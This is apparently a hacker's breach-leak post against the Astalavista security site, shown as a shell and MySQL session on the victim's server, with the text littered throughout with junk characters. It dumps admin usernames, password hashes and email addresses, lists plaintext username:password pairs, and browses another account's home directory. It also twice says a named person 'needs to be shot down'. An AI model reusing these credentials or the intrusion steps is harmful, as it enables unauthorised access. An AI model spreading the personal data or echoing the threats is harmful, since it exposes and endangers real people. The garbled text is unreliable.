<title>ASTALAVISTA.com - Exploits</title>) Q- k$ G' a Z5 c" ]
<link>http://www.astalavista.com/exploits</link>, d$ L- ^ F) X* w
<description>All availably Exploits.</description>
. |4 t* J+ U' \2 P. j' M; ? <language>en-us</language>
3 W& Y& k8 ]+ Q <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>
8 y. N( D R& h- } <docs>http://blogs.law.harvard.edu/tech/rss</docs>
4 U& j C3 D$ G$ T+ q- J) H" Y <generator>Astalavista.com</generator>
8 l) O$ P1 N" k$ J3 G! l# M <webMaster>info@astalavista.com</webMaster>’ . $items . ‘
8 `: E; `. T2 k9 w$ C </channel>
0 H' i) s, E+ f' x</rss>’;. c& i! @7 \/ b
9 n6 W$ g7 w/ r* M( |' z
if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {
s6 n& M( @+ x2 i! q# q unlink (FULLPATH . ‘/feed/exploits.xml’);
, |, e1 m9 W& s3 x+ ^5 }* ~ }
1 `7 P* A& c& y* [! y% ^5 S! O
' I5 w8 j8 c* X: I file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);
2 W5 H3 G+ t( ^1 ?; k9 ~[snip]2 L4 Z# o# x Y9 h E
( g7 N* l) I# e" l1 R7 L! Hsh-3.2$ cat exploits.sh
' Z+ W6 D3 p; n9 F# o; L#!/bin/sh
4 d: ^; `0 ?/ S% Q. v( S* W4 R" T Q2 y2 l8 U
########################################################### E6 O5 P7 Z" R) c6 S; _
# #
: \% f5 W2 S- S, p# Title: milw0rm exploits adder #9 {3 ~8 w4 k, h" Q# Y( A6 F
# Description: Add all milw0rm exploits to the #+ N- [6 W* Z/ k- q0 k
# Astalavista.com database #/ l' O( V% }2 D* w6 r
# #! \, A8 y0 M; A$ S) |
# Company: Astalavista Group #
: b- ?5 A4 U* _: R' Z, y* p3 m+ H# Author: Paulo M. Santos #
. P& m0 ]1 n- d, W E5 w3 l0 U }# E-Mail: 链接标记paulo.santos@astalavista.ch #
( L. c3 M, |3 L; O5 B% S B# t" Z& `# #, `4 o' ? ^6 m' P
###########################################################) l7 Y/ R+ E$ D$ V
. \" T' l1 d' L, O5 e
# path
0 A5 R, K& j1 k9 c! {2 f. P& Lthis_path=/home/com/public_html/modifications/cronjobs: S4 M& x. w( Z
0 c: q! f6 i/ x( n6 }' e
# change directory/ l; a' G2 e2 F1 s Q; u. r
cd $this_path' D4 h x" {! P* J3 R+ f
cd tmp/& W! m5 g/ w& W
3 j! L3 |7 n* `, X# delete files( o$ h6 T" t2 F
rm -rf milw0rm.tar.* &) U- a/ m& N% e5 D: N
rm -rf milw0rm/ &
, h0 j: H s/ ?; A, Q4 V& E9 R# ~5 U9 y) z0 T! s
# wget milw0rm paket) u8 M& I8 }' A t1 w9 C
wget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]
+ A8 z+ g9 |3 e _+ H6 z
* R: R. y( c8 O# extract milw0rm paket$ J( f n5 o. `6 r* ?0 @: n
tar -xvf milw0rm.tar.bz2
% i- E+ k0 ^6 J0 C! D4 s9 [: l) g. ~" W; P$ i; }/ X
# change owner" B. g: s2 N/ B5 C9 b1 R
chown -R com .
, y: Q' c; S4 Y" D% F9 k3 Ochgrp -R com .
9 e& q+ z! |: y/ d% g5 x" B8 c. f$ K* @% J/ h7 Q6 R5 T
# execute php script
) c1 h: e- W3 }' J2 Q* Bcd $this_path
! A# c! e8 P" S% v2 a: z+ w% W* ^1 mphp -q exploits.php
- F$ {7 p7 v# s; H; D
6 ^5 W6 k& `" V$ R# delete files
6 z$ z* S2 n( C4 | \rm -rf tmp/milw0rm.tar.*
- H, ~6 K9 T' c0 D! |1 grm -rf tmp/milw0rm/
6 f! O9 Y1 e2 v# D1 t" ^* W
9 b3 S2 p8 y2 n) V0 Jsh-3.2$ echo “Paulo M. Santos needs to be shot down.”
4 L" H, C* W$ l# \( Y- \1 F( ?Paulo M. Santos needs to be shot down.
3 r5 E8 _ n5 y3 a3 F* Z3 U$ t x* H3 W! q1 Y
mysql -u contrexxuser2 -p$ a2 i/ `- L# d2 V* }
Enter password:
' S; s( k O$ {# CWelcome to the MySQL monitor. Commands end with ; or \g.
' m! w" ~+ w* V" _# v/ { yYour MySQL connection id is 261694
0 L1 O/ R" b+ J+ V. v5 |Server version: 5.0.45-community-log MySQL Community Edition (GPL), E8 C6 y# C6 u( n+ q
( W, g+ t) |2 r, T6 c
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.1 l, j9 z! Q) X# p" F. D" R5 d# ~
' h1 v2 H5 I- C/ Xmysql> show databases;# a p6 r' a. n$ K$ N* ?( q+ t
+——————–+5 |6 b0 N6 B. A
| Database |( c6 W2 \! w" I
+——————–+
7 h6 v9 P2 B! H$ ?: x7 e" x1 D| information_schema |
' Y2 a9 J7 B( i' g| com_contrexx2 |* d2 E) S8 A+ R8 n, X) w2 M2 z
| com_contrexx2_live |
6 p9 d {! Q* C8 G' U* [| test |5 U0 M& o r' Y/ F/ `8 }
+——————–+
, z1 V3 X' I( `& q. A" x p& c8 e4 rows in set (0.00 sec); g$ t4 w }4 [7 }5 N6 R9 `0 @
. j Z: A: c0 w( K Umysql> use com_contrexx2_live5 _/ O) d; U5 J) l4 t
Database changed7 z, d# D2 v$ f( _0 q' x' @+ W8 F
mysql> show tables;7 E- u3 w6 G% s& i+ c3 n
+————————————————–+5 q/ x/ J" ?/ f5 z2 ~
| Tables_in_com_contrexx2_live |+ M- G; u7 D8 ^* K+ f9 u! Z# x
+————————————————–+% A( F+ A1 @8 M) ]' t
| cc_banner_counter |7 b! `/ m0 x: P4 d C& h
| cc_search_counter |
% d9 J' \ h- E1 p# K| contrexx_access_group_dynamic_ids |* s! Z8 @ c# p* C- t
| contrexx_access_group_static_ids |
2 i0 B9 Y$ H1 \. l4 o/ n| contrexx_access_rel_user_group |, }) L C, B4 W2 w! w! S
| contrexx_access_settings | h P; \, [4 f; ~( }
| contrexx_access_user_attribute |/ a2 R* |; b9 [& f% J
| contrexx_access_user_attribute_name |6 _, P$ e0 I4 Z4 j. L; b- ]
| contrexx_access_user_attribute_value |( V2 K3 n$ C5 i
| contrexx_access_user_core_attribute |
, L3 y5 h' Z/ y3 G1 ?, A| contrexx_access_user_groups |8 R+ n- n. d( w
| contrexx_access_user_mail |3 E* ]7 V9 q' j- e- L
| contrexx_access_user_profile |
7 i U; Z; C/ l* I6 c| contrexx_access_user_title |
; Y8 D7 @9 m- d6 `1 T, f. u| contrexx_access_user_validity |! m/ j6 b0 F% N* ~ R0 E5 o
| contrexx_access_users |
& c% {3 A4 M" d2 M$ ~- X: y# d| contrexx_backend_areas |
' o4 i9 j- n a, l1 l H P| contrexx_backups |
6 D$ [4 }, E/ }. {& w| contrexx_content |
9 c4 R7 I2 R6 j| contrexx_content_history |
z9 ]& m$ @+ a3 X4 G. I! s| contrexx_content_logfile |) q. c& _; Q( V# U$ ^* B& _
| contrexx_content_navigation |; q4 j! ?- j9 a; L9 \5 i
| contrexx_content_navigation_history |
! J- A9 P r1 U5 ]$ l| contrexx_ids |
! Z! S! [/ `$ \' J3 L6 Y; C| contrexx_languages |' F9 n! ^' `' p+ r& d4 a3 m
| contrexx_lib_country |$ ^1 K7 G. \- U9 r9 z' U
| contrexx_log |% V' t4 ~. _0 K$ v
| contrexx_module_alias_source |
8 }$ J3 R: E9 z| contrexx_module_alias_target |; H1 f* T# p0 ^* C: l8 d' H( C* F
| contrexx_module_block_blocks |9 A& y$ i; ` `3 @" y" n e
| contrexx_module_block_rel_lang |9 S" e* ~0 Y h& g, G ^+ B/ O
| contrexx_module_block_rel_pages |
% i- Q7 s: T7 Q| contrexx_module_block_settings |
9 v' [( [3 ]8 e- d; v, ?6 w| contrexx_module_blog_categories |% E2 f% l/ `2 E& X5 f/ [% n& y
| contrexx_module_blog_comments |9 v8 s$ ~8 {3 |4 g/ N0 n
| contrexx_module_blog_message_to_category |8 T/ i: E2 {3 [; X2 d! p
| contrexx_module_blog_messages |
u! D$ O- z* F$ _4 || contrexx_module_blog_messages_lang |: {) L" e7 [' t) C+ D% v
| contrexx_module_blog_networks |2 G# Q: H4 F- |" _/ [# I
| contrexx_module_blog_networks_lang |
" ^2 M% K. H4 C/ P4 Y| contrexx_module_blog_settings |
" O4 [! H& q4 ]3 u i: _| contrexx_module_blog_votes |" _1 a# Z( A. n0 a( L/ c
| contrexx_module_calendar |
+ o8 U/ I% T0 v* U7 ^4 E! z| contrexx_module_calendar_access |
' p' }, I a: n) X+ L; c| contrexx_module_calendar_categories |
3 q- ]- a) n/ f) n Q0 j/ B5 i| contrexx_module_calendar_form_data |
/ X5 ~& R* f/ r, H( {| contrexx_module_calendar_form_fields |9 M1 _( R3 l5 ` E& {/ R
| contrexx_module_calendar_registrations |
5 R6 B1 q2 O' s4 `( D" I( u| contrexx_module_calendar_settings |
4 p- Z5 N- W5 a9 u! }5 N| contrexx_module_calendar_style |
A' W4 b. ~5 F5 D* c: n4 B| contrexx_module_contact_form |
5 x8 l; e* \" f& N# V| contrexx_module_contact_form_data |
; [% m! Z. H' V" s) d4 D: c| contrexx_module_contact_form_field |% E" V( _) r: ^
| contrexx_module_contact_settings |
# \3 L2 b& J; S! @/ g9 t' h; y) F| contrexx_module_data_categories |# L- Z; Y8 T, f
| contrexx_module_data_message_to_category |
: I6 h* n: }3 v: B: T& ]: W| contrexx_module_data_messages |' V; o5 u( O% S' Z
| contrexx_module_data_messages_lang |
# y8 r+ E- k) k, w| contrexx_module_data_placeholders |# v1 V1 T8 x* g. o1 t4 o. X
| contrexx_module_data_settings |
- I! y ~ W, e% q) W| contrexx_module_directory_access |, K+ S- m C6 _0 S& B% R
| contrexx_module_directory_categories |+ X7 D' j, x: G3 y6 ~0 a; x
| contrexx_module_directory_dir |
$ @1 M7 s; r( [' ^7 [( D| contrexx_module_directory_inputfields |
' H4 f2 `+ p/ X| contrexx_module_directory_levels |, r) U3 e* {/ x" i2 o
| contrexx_module_directory_mail |
; Z" _' ?1 I: n0 N2 Q8 n$ y| contrexx_module_directory_rel_dir_cat |' i1 o% N3 T9 h( V! N. a
| contrexx_module_directory_rel_dir_level |& }; L- ?9 r( F4 `6 q" s0 U- G
| contrexx_module_directory_settings |0 j2 t& V5 ]& n4 p' |- ~+ Q' @) H( o
| contrexx_module_directory_settings_google |" H( d9 s% r6 s% A/ X3 l& ?1 ~
| contrexx_module_directory_vote |# m, E4 w" X; Y, C
| contrexx_module_docsys |( |' a# `1 g8 u4 n. g8 S
| contrexx_module_docsys_categories |4 P& U; H" D3 |! m+ b, e+ W: @
| contrexx_module_egov_configuration | A l* H; U) T& y8 p
| contrexx_module_egov_orders |6 R8 @$ i) G$ ?: K2 l
| contrexx_module_egov_product_calendar |( e6 g9 U Z4 l* O
| contrexx_module_egov_product_fields |
8 g7 W5 v$ I! K$ u5 `( v& h| contrexx_module_egov_products |6 F q7 G3 L2 s8 w9 b
| contrexx_module_egov_settings |5 J) d" l5 J: b5 u2 I$ R
| contrexx_module_exploits |7 ~4 k' T5 Y- H6 Z6 A
| contrexx_module_exploits_categories |
8 G$ p6 H) \* P; O8 \| contrexx_module_feed_category |
3 c% g* ~5 u, W6 X, y| contrexx_module_feed_news |
2 S3 P5 V1 O0 l| contrexx_module_feed_newsml_association |8 L9 I& T0 y$ m6 c @
| contrexx_module_feed_newsml_categories |% U! p1 M% {% @& c- [
| contrexx_module_feed_newsml_documents |
l" y$ w0 J9 a; `/ j- y* e, e6 J| contrexx_module_feed_newsml_providers |: I+ m6 {; M+ R: Z* Y3 k) ^5 x: c
| contrexx_module_forum_access |
- a8 z: O6 }$ h# ?2 u| contrexx_module_forum_categories |) g/ i6 ~) p9 T9 B- f
| contrexx_module_forum_categories_lang |& m# y* X1 i; w* {
| contrexx_module_forum_notification |+ D0 r1 Y7 y. `5 U' r/ ]
| contrexx_module_forum_postings |
4 O3 D r( I# V9 q) h| contrexx_module_forum_rating |
! @. o- v9 D6 I% Q4 C| contrexx_module_forum_settings |) ?, V3 x: z7 n' b
| contrexx_module_forum_statistics |; r$ Y2 s+ x* c9 k
| contrexx_module_gallery_categories |
+ Y; l% ~( n9 _( U8 b| contrexx_module_gallery_comments |
0 a' Q) w6 Q+ \5 x| contrexx_module_gallery_language |6 D8 ?' B' L- A% X2 L" C
| contrexx_module_gallery_language_pics |. P. T5 w1 A+ ]6 z. Z
| contrexx_module_gallery_pictures |8 k& L5 `9 k+ o! R8 d2 Z2 P: n# X
| contrexx_module_gallery_settings |
1 s( ]+ s. R2 l/ {5 ?* d| contrexx_module_gallery_votes | \8 I' y& Y E; e5 t4 W4 t# q
| contrexx_module_guestbook |
6 [6 f6 z) D) Z; ?) T/ J| contrexx_module_guestbook_settings |3 W$ s1 X5 ~9 z& M' E3 ]1 G
| contrexx_module_livecam |
& y0 j7 q G5 W. E5 }| contrexx_module_livecam_settings |- o' E& i1 A/ l6 S, K
| contrexx_module_market |
" @# l9 {0 A8 b) c: c1 Y& A l9 b" s| contrexx_module_market_access |( ^9 o) d* l: D) V9 k
| contrexx_module_market_categories |/ X( v" @1 \/ v7 x
| contrexx_module_market_mail | Q) i( c2 i, w) {$ B# v
| contrexx_module_market_paypal |
) s5 X# u5 K3 k! i ^| contrexx_module_market_settings |
- S5 Z z. @- \7 p" I| contrexx_module_market_spez_fields |
0 N7 u* t" [* E( w7 T5 D| contrexx_module_mediadir_access |% b) [; Z: k( @
| contrexx_module_mediadir_categories |
' `& X2 G3 @, Q& p/ |# d4 _) G# E| contrexx_module_mediadir_comments |: w5 `: |6 D# A* z% b; {
| contrexx_module_mediadir_dir |
9 x) B* b3 y5 t' {2 _5 T| contrexx_module_mediadir_inputfields |: x# M, p' r) |& p7 N8 T% D& [: W
| contrexx_module_mediadir_levels |
; G; y4 l& b; J5 j5 T| contrexx_module_mediadir_mail |. L( f: X4 q- }; }
| contrexx_module_mediadir_rel_dir_cat |/ c, |+ H, j# A! L! U' [9 i7 [
| contrexx_module_mediadir_rel_dir_level |& \9 x% q7 w$ q+ x6 P' u4 [
| contrexx_module_mediadir_reports |3 |. b* @: n, v1 M& }
| contrexx_module_mediadir_settings |3 g# ]' q" Z1 t, W# B
| contrexx_module_mediadir_settings_google |
: m9 n$ C1 s9 K0 || contrexx_module_mediadir_vote |8 Q0 j1 v' _ e3 I% E9 J
| contrexx_module_memberdir_directories |
/ t# ~) \$ O& _: ^ l| contrexx_module_memberdir_name |
# ~# a$ z% `/ j# C) X, [2 r| contrexx_module_memberdir_settings |
- ]* }: O. O3 \& E1 k| contrexx_module_memberdir_values |4 r0 h4 f7 W1 f% G3 Y* z% s$ t
| contrexx_module_nettools_allowed_groups |
% h o; {/ A: u: M4 O! R* _| contrexx_module_nettools_settings |
" Z5 D* \: z4 B7 H| contrexx_module_news |+ J( n* ~3 G( x. ~4 I
| contrexx_module_news_access |
2 I4 _$ w6 T |4 b( Z0 a| contrexx_module_news_categories |
: ?: Q: O! ^9 }. ?$ Q9 f| contrexx_module_news_settings |
4 Y& X' O' \# F2 Z) d; _ O8 z| contrexx_module_news_teaser_frame |: g! q5 g, d% K% j( V" k! s
| contrexx_module_news_teaser_frame_templates |; [, X9 w' d6 H+ z
| contrexx_module_news_ticker |
8 ]; a% \9 w' ?0 |% K| contrexx_module_newsletter |
8 U2 l' p4 P8 ^- J| contrexx_module_newsletter_attachment |
6 X; N; ]( e/ j2 d" a- v5 q! F% }| contrexx_module_newsletter_category |2 {0 b/ z. ?7 `( {0 |6 j& [7 _
| contrexx_module_newsletter_confirm_mail | K8 ^5 s3 Y6 O; q5 B$ a, u% R$ }
| contrexx_module_newsletter_rel_cat_news |! o0 e; p& i! u
| contrexx_module_newsletter_rel_user_cat |7 b4 d9 s& ~6 Z8 g0 @- h+ l3 a% f
| contrexx_module_newsletter_settings |7 B0 J5 E" R! n! n& G- W& E6 X
| contrexx_module_newsletter_template |5 S" m% ?2 p9 A
| contrexx_module_newsletter_tmp_sending | Q7 b6 {# o3 g
| contrexx_module_newsletter_user |
3 Q9 J6 P, A8 e* I1 v| contrexx_module_newsletter_user_title |5 v. X' ^; r9 I: b8 C r
| contrexx_module_onlinetools_defaultports |, F, V* }/ u; N( m2 p( ]
| contrexx_module_onlinetools_defaultports_back |
! L- E$ r: |7 a& s$ L L9 S5 f$ ?% ^| contrexx_module_onlinetools_geolitecity_blocks |
- x2 {6 Y, h) Q3 Z- @2 j| contrexx_module_onlinetools_geolitecity_country |
- K/ z6 J! z% U2 E/ N' D| contrexx_module_onlinetools_geolitecity_location |% p. w! Q( N A. i9 I
| contrexx_module_podcast_category |! m' b# R+ |$ \( M. I& D. f
| contrexx_module_podcast_medium |
; l! Z; c4 w( l$ h6 }4 [+ o6 d| contrexx_module_podcast_rel_category_lang |& V, M; A- C& D/ x; F* d- S
| contrexx_module_podcast_rel_medium_category |
& g9 q7 H2 N3 W* }$ t| contrexx_module_podcast_settings |
q* h6 Y0 A5 s- t3 }2 S1 k- r| contrexx_module_podcast_template |
s( @3 q* a: w5 B5 b& ~| contrexx_module_proxydb |
3 {. e$ E! k* n7 t* f# v+ t6 t/ Z| contrexx_module_recommend |0 z) t: R" ~4 k4 n- }0 }* I
| contrexx_module_repository |
: r% ~8 X8 [0 d! @6 }| contrexx_module_securitynews_cats |, m2 t: i* i8 D
| contrexx_module_securitynews_feeds |: G/ r% h; r8 t8 o4 h
| contrexx_module_securitynews_news |
9 X3 H {% P$ H| contrexx_module_shop_categories |
3 j, y7 y& E) l8 X" }. E5 o' @| contrexx_module_shop_config |
: J2 S k; ^/ C i| contrexx_module_shop_countries |
! U0 e9 k. Z5 ^1 ?# || contrexx_module_shop_currencies |( z3 ]5 X" U+ K D, M3 l( E
| contrexx_module_shop_customers |5 P$ h) o9 r S- K9 D, S6 ]7 o$ @
| contrexx_module_shop_importimg |* M- I: d4 e2 E% b" B0 G* C
| contrexx_module_shop_lsv |4 d4 R; [# K; R% h' f/ P( F& O
| contrexx_module_shop_mail |. m7 [0 C# _8 c( v+ }/ s" q2 r7 F8 }- b
| contrexx_module_shop_mail_content |
6 ^3 [( v) S; {| contrexx_module_shop_manufacturer |; j) p- {% Y% z& \, Y
| contrexx_module_shop_order_items |
5 j: x% X. z+ W6 f+ A5 i5 q$ O) @7 u| contrexx_module_shop_order_items_attributes |
4 E$ G% a$ ^9 E2 }; T| contrexx_module_shop_orders |* d3 J, v0 N. y2 U: n+ d( C& L3 E+ E1 y
| contrexx_module_shop_payment |( q5 |% g+ N4 _2 G0 Y" @2 G4 s
| contrexx_module_shop_payment_processors |
3 m; e0 |3 L; T4 M$ d6 r# I| contrexx_module_shop_pricelists |
) K6 u* K1 X* G# U F" f+ H| contrexx_module_shop_products |; u& ^; E" R# H! i! M8 R2 S
| contrexx_module_shop_products_attributes |
$ K P/ X" L+ z0 f0 Q+ T- w1 p| contrexx_module_shop_products_attributes_name |
7 R- H- o7 }; N2 V; H2 M: P| contrexx_module_shop_products_attributes_value |
* ]6 U0 @/ ^ A: R% }| contrexx_module_shop_products_downloads |
& j( a6 q# a' @, R& S| contrexx_module_shop_rel_countries |
( n$ I. R8 n. K/ v& i0 \& C| contrexx_module_shop_rel_payment |
# Q0 d' _. R7 z# W1 j# c$ Z| contrexx_module_shop_rel_shipment |# C) c; Z) U% ]* z/ A2 R* X! i4 z. Q
| contrexx_module_shop_shipment_cost |
R9 M3 g8 z- p- v: B! e0 l# u/ A| contrexx_module_shop_shipper |
5 k( D0 t9 d8 k' g! t$ h/ _" c| contrexx_module_shop_vat |
+ I, s" K, m$ T- R! \7 L6 _1 i' U| contrexx_module_shop_zones |; @% r3 j) l) H
| contrexx_module_u2u_address_list |9 I) Z# Y8 j( X& X6 G
| contrexx_module_u2u_message_log |) S' D, {5 M4 Y, Y: s& |0 X% h5 [
| contrexx_module_u2u_sent_messages |
: ~2 B4 s) B6 b$ d( W9 P5 O0 p/ r| contrexx_module_u2u_settings |4 H! R- A* O# G% N
| contrexx_module_u2u_user_log |- d: C7 i! B% t7 Z# a% P
| contrexx_modules |
: R! K/ K3 t. R7 | [% z" ]| contrexx_sessions |9 t8 A# Y8 V" n' m) V# m k& O
| contrexx_settings |. Q3 B8 y2 F) G+ e6 Y
| contrexx_settings_smtp |
4 V5 a* R! @0 d' A+ _" `$ O# S| contrexx_skins |
! u; L5 L8 @! T$ |! \| contrexx_stats_browser |
# Z3 O( p) X/ s/ o' j8 i| contrexx_stats_colourdepth |% V; R" J: e. |+ _1 F6 T9 N; L' P
| contrexx_stats_config |
/ d9 x- d# O( l% M: O& Z% M| contrexx_stats_country |
3 l8 Y. X' S1 x4 w6 o| contrexx_stats_hostname |
9 A% o0 C1 F* q( s* T| contrexx_stats_javascript |
3 C, `7 ^5 }) ]| contrexx_stats_operatingsystem | a% h$ p: U7 O5 ?- A# Q& l5 r
| contrexx_stats_referer |+ }% P7 ?8 R. W% J. u
| contrexx_stats_requests |
& C) W) z. Q/ N) b1 Q| contrexx_stats_requests_summary |
% x* ?& x* V: M @9 b! B| contrexx_stats_screenresolution |
2 L8 ]! u5 ]/ E! p# b# R8 E0 A| contrexx_stats_search |
0 \, ~8 A# f" H. U; ^9 j4 C| contrexx_stats_spiders |1 z. [7 y ^. r& g
| contrexx_stats_spiders_summary |' O- N$ |5 B& ]) t' }6 I7 y
| contrexx_stats_visitors |4 M, s: b# {; c3 @$ r
| contrexx_stats_visitors_summary |
, `% ?/ T+ m* d( b/ v| contrexx_voting_additionaldata |7 P) P: R* w0 u; h0 I$ e% F
| contrexx_voting_email |
* H; R& d8 ?7 ^& L| contrexx_voting_rel_email_system |; U: ^( g0 { c- n$ j
| contrexx_voting_results |
4 }" F! \- {0 _" k9 P8 s| contrexx_voting_system |! G9 G2 H6 M- d+ U
| foo |
& |, i2 l6 G* F; A4 P' {+————————————————–+
1 r# G8 j" Q: y2 a8 P227 rows in set (0.01 sec)9 S' i" ]; g3 ? i7 z) f0 l
% K9 h+ K3 j) B g3 Q/ T
mysql> select count(*) as skids from contrexx_access_users;
/ d1 A+ C7 G5 E7 {% J# c Z+——-+& H! p0 z0 `" I4 r
| skids |) @, D! K: t/ o5 r
+——-+
6 D- q' G/ _ Z, l6 ^) k| 53699 |
& p {2 }) D' c3 e: E, C7 g0 ]) c% k+——-+: X% S$ K. @- C1 ]! [( z+ l
1 row in set (0.00 sec)
% a2 [( i+ Z \3 g2 Y- |
- z* ? J1 ?5 _$ b6 fmysql> describe contrexx_access_users;
) J5 Z) c/ x# a d+——————+——————————————+——+—–+————–+—————-+
2 Z& y3 P9 P; G| Field | Type | Null | Key | Default | Extra |) {' T# \7 K8 Z$ }: `
+——————+——————————————+——+—–+————–+—————-+
+ J! [9 s# S( f% r| id | int(10) unsigned | NO | PRI | NULL | auto_increment |: ^& C: x$ N5 W7 P% Q' x4 b8 r
| is_admin | tinyint(1) unsigned | NO | | 0 | |2 X) z8 F: k$ P0 ^! T. m* C
| username | varchar(40) | YES | MUL | NULL | |
( W, U; \- X% o0 b: V6 w| password | varchar(32) | YES | | NULL | |1 B/ k4 N: [. C0 F+ A) X
| regdate | int(14) unsigned | NO | | 0 | |
! e4 ~) @3 I& S1 k) G| expiration | int(14) unsigned | NO | | 0 | |
) z# L/ A8 R$ N3 i: A% u# s1 f+ U4 j| validity | int(10) unsigned | NO | | 0 | |
2 Y" `; Z- ?* m6 Y6 v2 `4 Y| last_auth | int(14) unsigned | NO | | 0 | |
; T8 H7 N$ ?) V% t" h| last_activity | int(14) unsigned | NO | | 0 | |: n0 r9 q# `/ |+ L4 }" t8 j# t. _
| email | varchar(255) | YES | | NULL | |( c( p* u! I% S1 r0 M* P ^ X c
| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |
5 Y/ O. P3 A" ?8 k' L| frontend_lang_id | int(2) unsigned | NO | | 0 | |" z3 _* j2 O5 x9 a3 m$ C
| backend_lang_id | int(2) unsigned | NO | | 0 | |# x6 R4 O4 c; {' |& \
| active | tinyint(1) | NO | | 0 | |
7 |+ q0 X1 |' Q% @| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |
# i! p5 ^) a' \- H* || restore_key | varchar(32) | NO | | | | S" t* d; k3 ?& P& U9 {
| restore_key_time | int(14) unsigned | NO | | 0 | |
3 c6 b7 M8 d9 ?4 h3 j* ]| u2u_active | enum(’0′,’1′) | NO | | 1 | | ~8 y' ~( x3 r2 V! u7 L1 G
+——————+——————————————+——+—–+————–+—————-+2 q. w5 c, B$ S, P1 W0 p _
18 rows in set (0.00 sec)2 O. A7 A" Q) l4 M" t
! n7 }$ l0 P, s6 {' amysql> select username,password,email from contrexx_access_users where is_admin = 1;9 k3 Y( D: I: F
+————+———————————-+—————————–+/ s k9 y1 M: _9 m0 l
| username | password | email |
0 O% ^# A+ ?* H! r8 o( k+————+———————————-+—————————–+
. I; k$ H0 \/ R) a! B8 z; {| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |
% ^* ?9 D6 ~' i g| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |
2 O& @3 `! L4 f2 Y! Z+ I| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |
: K$ O* _/ L' a| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |
" W" t! m3 W3 j; u+ A+ @+————+———————————-+—————————–+1 O0 d' {( T! U" _! j Z+ C
4 rows in set (0.04 sec)
$ p$ W3 J( x. f2 N; U r: Q7 f5 s; y L1 E- ]( V1 g
mysql> exit;
4 H T$ X1 T1 mBye3 G& o7 ]0 W2 J+ n7 V- i3 R3 {
5 R( B5 c+ G' \( E: w1 D% V
[~] There you go, your “team of security and IT professionals” is a joke.8 y/ r. [( O+ z+ Z5 y0 |
% g% {6 Q" t) L+ F) }6 g, U$ f! F
+——————————+4 X" t; y. o! S- P
system:f82BN3+_*# O: O9 p# T- K6 A2 B
Be1er0ph0r:belerophor4astacom
' z3 N' X- p% \; lprozac:asta4cms!
* K9 d3 Z8 Z8 p* {9 }9 Ycommander:mpbdaagf6m
5 D& ^, ]+ ^) A9 [5 L- D: P$ |4 r5 gsykadul:ak29eral
) M& W; \2 ~7 E1 w2 q$ ^0 _" N+——————————+
1 s: \: X6 j; E# {+ Z, |% L. ^7 C6 [! T! Q2 W7 e- T
[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)) E5 d, K8 n3 g" K8 i+ o# n
…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.5 V" t. o5 p/ U$ K K. i
4 |2 A* h5 o1 o, x% C" a
[~] Lets move to astalavista.net now,1 `5 J6 b& N! Z5 T/ l2 \# d7 A; N
+ S, @0 W, a( D
From <链接标记[url]https://www.astalavista.net/[/url]>:
) y6 d+ p" B3 q>> Everyone knows that the best defense is a good offense.4 Q: N+ T/ a" U( H5 j' q
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy." ?' q+ n! D) q$ y
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.1 k; {8 E9 `# o, |: A+ `6 r
>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”) c0 z3 J$ a% U3 h1 e, Z
5 \+ V7 [) E) e# ^2 G( {3 g
>> Go ahead, try and hack our server . in a completely legal way!
) D5 E9 z8 P/ o: |. P4 o( p( g1 f>> Learn by doing: We offer our members tricky tasks and challenges on an
+ y+ [8 r" m* R% B/ P8 O1 g$ y>> ongoing basis so you can test your knowledge and abilities. You can also3 R4 h' _1 V* U6 Z* A: ]
>> demonstrate what you.ve mastered by taking part in regular hacker contests6 l+ |1 a1 [" |' e( _2 U
>> and war games
* G. |( O% b% Z: d8 g- ^3 O! O( f# ]. v$ b. y. n/ I
[~] Lets take a look there, after all… they are hack-proof, aren’t they?!$ p9 G& M2 t' S; d }' m
+ e$ H0 E0 [) r' i[-] Tricky task: Find home dir of astalavista.net
1 X0 m# H3 s2 y3 h& f
! }9 X5 q) {% z1 ]+ @6 A* nsh-3.2$ ls -la ~astanet1 z- v/ B" a5 d$ Y& }
total 48# a9 H3 E* M$ Y
drwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .8 [. O7 S9 e. S. Q$ y
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
1 `. x$ u1 k, h5 o* Vdrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
! ^) ^* U& f! F) {-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history! f6 E8 t$ t( Q! F/ D' m
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout6 ^( p. @% H8 D, j: v* \1 g
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
7 w- |& M' z/ ^# S: q-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc6 \( Y( r1 H' I. ^3 t
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains8 e( z" g9 k2 R% ?+ h g) p
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap7 Z. q i" r% N1 T, y
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
+ }4 }. v: M3 M1 _! H& O* b; [- Rlrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
: G* w$ ?4 Z* N' Q2 V0 n-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
$ m; z5 r1 @4 n0 \9 B6 O! d( Y/ O) u+ s# X9 x- E( \ y9 `
sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
/ q9 U7 T, V7 C R, msh-3.2$ ls -la
